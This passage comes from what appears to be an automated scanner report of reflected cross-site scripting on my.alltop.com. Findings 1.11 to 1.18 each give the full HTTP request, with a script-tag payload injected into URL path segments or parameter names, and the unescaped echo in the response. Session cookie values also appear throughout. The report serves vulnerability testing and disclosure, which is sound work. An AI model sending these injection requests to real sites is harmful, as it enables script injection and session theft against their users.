Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000BF)%3C/script%3Efa79a"><script>alert(1)</script>cbd44e0cb8a" method="post" accept-charset="utf-8">
...[SNIP]...

1.11. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e3de"><script>alert(1)</script>9890588f225 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/'%22--%3E%3C5e3de"><script>alert(1)</script>9890588f225/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:58 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:58 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/'%22--%3E%3C5e3de"><script>alert(1)</script>9890588f225/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.12. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b138e"><script>alert(1)</script>302606c0f47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/'%22--%3E%3C/style%3E%3Cb138e"><script>alert(1)</script>302606c0f47/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:00 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:01 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:01 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/'%22--%3E%3C/style%3E%3Cb138e"><script>alert(1)</script>302606c0f47/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.13. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb335"><script>alert(1)</script>26cb49a1f48 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3Cbb335"><script>alert(1)</script>26cb49a1f48/script%3E HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:05 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3Cbb335"><script>alert(1)</script>26cb49a1f48/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.14. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 399d9"><script>alert(1)</script>f107f099ee0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E399d9"><script>alert(1)</script>f107f099ee0 HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:09 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E399d9"><script>alert(1)</script>f107f099ee0" method="post" accept-charset="utf-8">
...[SNIP]...

1.15. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a0a3"><script>alert(1)</script>aa3f3fd8855 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E?7a0a3"><script>alert(1)</script>aa3f3fd8855=1 HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:54 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E?7a0a3"><script>alert(1)</script>aa3f3fd8855=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.16. http://my.alltop.com/alpha//%22ns=%22netsparker(0x00013A) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha//%22ns=%22netsparker(0x00013A)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 207fa"><script>alert(1)</script>b634162474e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha//%22ns207fa"><script>alert(1)</script>b634162474e=%22netsparker(0x00013A) HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:59 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:02 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:02 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha//%22ns207fa"><script>alert(1)</script>b634162474e=%22netsparker(0x00013A)" method="post" accept-charset="utf-8">
...[SNIP]...

1.17. http://my.alltop.com/alpha//%22ns=%22netsparker(0x00013A) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha//%22ns=%22netsparker(0x00013A)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7210"><script>alert(1)</script>b3c26a3383e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha//%22ns=%22netsparker(0x00013A)?d7210"><script>alert(1)</script>b3c26a3383e=1 HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:56 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:56 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:56 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha//%22ns=%22netsparker(0x00013A)?d7210"><script>alert(1)</script>b3c26a3383e=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.18. http://my.alltop.com/alpha//%2522ns%253D%2522netsparker%25280x00013E%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha//%2522ns%253D%2522netsparker%25280x00013E%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66da4"><script>alert(1)</script>b6fc588523a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha//%2522ns%253D%2522netsparker%25280x00013E%2529)66da4"><script>alert(1)</script>b6fc588523a HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
